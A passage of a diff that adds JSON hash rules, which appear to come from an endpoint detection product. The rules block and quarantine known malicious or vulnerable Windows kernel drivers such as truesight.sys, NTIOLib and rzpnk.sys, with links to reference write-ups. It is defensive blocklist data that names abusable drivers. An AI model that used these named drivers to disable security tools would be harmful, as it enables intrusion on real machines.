+ "creation_date": "2026-03-23T11:45:29.967969Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967975Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0988d366572a57b3015d875b60704517d05115580678e8f2e126f771eda28f7b",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b80f62f7-adde-5c34-bfef-112b524175cc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.497559Z",
+ "creation_date": "2026-03-23T11:45:31.497562Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.497568Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b026fbaa7607d48e26f291e514de72700c84fde7f4f417123525407707a155f7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b81d601b-185b-5e90-9cac-f96693cbc52f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.472052Z",
+ "creation_date": "2026-03-23T11:45:31.472055Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.472063Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "06a39013cc3c9485537d7e8bbfab5fecd7046372e38bcf921182994883951198",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b8235725-f2c4-5330-9ef6-2c3bdca7e808",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145451Z",
+ "creation_date": "2026-03-23T11:45:32.145453Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145459Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ebe86f9f6c9c6639f3327f210c2a945bbbf069f505b1b85e3aee8d1cddf702f9",
+ "comment": "Malicious Kernel Driver (aka driver_206006a1.sys) [https://www.loldrivers.io/drivers/9e0a1bae-6509-41fd-a5bf-dfe6cf388682/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b83eef7a-8f92-53d0-aad1-f7785ff427a0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825725Z",
+ "creation_date": "2026-03-23T11:45:30.825728Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825733Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "da08b5a88175b58d0f7fcefeb0eef3efe8ae12e6c04c6f60e88cc4e860e2c277",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b8577b45-ccd7-59f8-817e-29c753804b74",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152418Z",
+ "creation_date": "2026-03-23T11:45:31.152421Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152429Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ae97c26f8724639a6b4e7644625a82c6b548d048b0a89c8f8bb6c62f7d7fe84b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b85bc58f-034a-5ecc-96af-c16494b0ee29",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824845Z",
+ "creation_date": "2026-03-23T11:45:31.824849Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824859Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "579ba5f388f4339330735b738f56641c074d5ebeafcce468a578b4cc1517b38b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b8774bcf-44e2-57fc-9191-e7381e474f73",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614902Z",
+ "creation_date": "2026-03-23T11:45:29.614906Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614912Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cf4b5fa853ce809f1924df3a3ae3c4e191878c4ea5248d8785dc7e51807a512b",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b88098fd-f140-5aca-aade-096954713ea8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.456132Z",
+ "creation_date": "2026-03-23T11:45:30.456135Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456144Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "274340f7185a0cc047d82ecfb2cce5bd18764ee558b5227894565c2f9fe9f6ab",
+ "comment": "Vulnerable Kernel Driver (aka fd3b7234419fafc9bdd533f48896ed73_b816c5cd.sys) [https://www.loldrivers.io/drivers/c7f76931-e24c-4d94-9e1f-5a083da581b4/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b8855b70-3f0c-5a37-881d-fb631a667460",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.482825Z",
+ "creation_date": "2026-03-23T11:45:31.482829Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.482838Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dd9ff740c73b48deb5dde01edb84e4961aff64152fcc405edff5497b4cac2418",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b88c08be-f404-58a2-9249-cf9c85dae775",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980306Z",
+ "creation_date": "2026-03-23T11:45:29.980308Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980313Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9724488ca2ba4c787640c49131f4d1daae5bd47d6b2e7e5f9e8918b1d6f655be",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b893c1a0-6640-5220-a74b-6ec21d9dc4e9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.147113Z",
+ "creation_date": "2026-03-23T11:45:32.147115Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.147121Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bcc5394705e552d0312592c507b71a6bd921782f82bb5b4acc721d2f056030a5",
+ "comment": "Vulnerable Kernel Driver (aka LnvMSRIO.sys) [https://blog.quarkslab.com/exploiting-lenovo-driver-cve-2025-8061.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b8babd50-004a-5bea-af55-061dd1922a6f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453884Z",
+ "creation_date": "2026-03-23T11:45:30.453887Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453896Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e1a6c1e23108ede9167ffdf9ebc6af64a011bdafc57d25f84afab6c021ae7741",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b8c10f77-8c2a-500e-9efb-80e9445aec96",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615048Z",
+ "creation_date": "2026-03-23T11:45:29.615050Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615055Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fd8669794c67b396c12fc5f08e9c004fdf851a82faf302846878173e4fbecb03",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b8d1d6bb-3817-5fd9-a720-fa8e09eb6cdd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826384Z",
+ "creation_date": "2026-03-23T11:45:31.826386Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826391Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "749216268b2e85c3528db4be76eda878d8c6c3605c57fa2c7a5acd11074deb71",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b8d3d4a7-028b-5769-9c6b-3cfe2dff7a5a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811363Z",
+ "creation_date": "2026-03-23T11:45:31.811365Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811371Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9b91d3fb5e9bfafa19547e604113f506f1d4ad1d108157fbbef81a82708e8d6d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b8d82f74-d647-5a8b-8c89-c27e09f96f12",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493597Z",
+ "creation_date": "2026-03-23T11:45:31.493600Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493609Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "88010b12941fee7b9f24cc6a57f990826bed907073ff55ca0f325a1aa2c23a0b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b8f1634e-2502-5dae-aac9-22e2a4371d91",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493087Z",
+ "creation_date": "2026-03-23T11:45:31.493090Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493099Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "101b95e50f005d464c583d826574639ae8f1d03fa2cc83345ae2b8b53f93a772",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b8f6de7d-77c9-5a2a-8966-3fd8b03ee0a3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616185Z",
+ "creation_date": "2026-03-23T11:45:29.616187Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616193Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "63041a13d1658e22fecc34706e98ab08b54b94e7d028bf2b1308ff85995a01c3",
+ "comment": "Phoenix Tech. vulnerable BIOS update tool (aka PhlashNT.sys and WinFlash64.sys) [https://www.loldrivers.io/drivers/be3e49ea-095e-4fdb-9529-f4c2dbb9a9fc/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b8f98719-b497-5bbf-9a93-1d0e9679f5de",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476242Z",
+ "creation_date": "2026-03-23T11:45:30.476245Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.476256Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d1c78c8ba70368e96515fb0596598938a8f9efa8f9f5d9e068ee008f03020fee",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b8ff4ac5-46ca-5ad3-993a-f94b148ac0c3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614631Z",
+ "creation_date": "2026-03-23T11:45:29.614633Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614638Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6f1ff29e2e710f6d064dc74e8e011331d807c32cc2a622cbe507fd4b4d43f8f4",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b9041cd3-6bef-5804-8faf-c6883393024e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833865Z",
+ "creation_date": "2026-03-23T11:45:30.833885Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833894Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5f784d2666fac241c31cec0cc285d228662d509ec75678565d4a63d5a4712c7b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b91f3844-6497-5ebf-a091-3ab60f51c63b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818006Z",
+ "creation_date": "2026-03-23T11:45:31.818009Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818016Z",
+ "rule_level": null,
+ "rule_level_override": null,
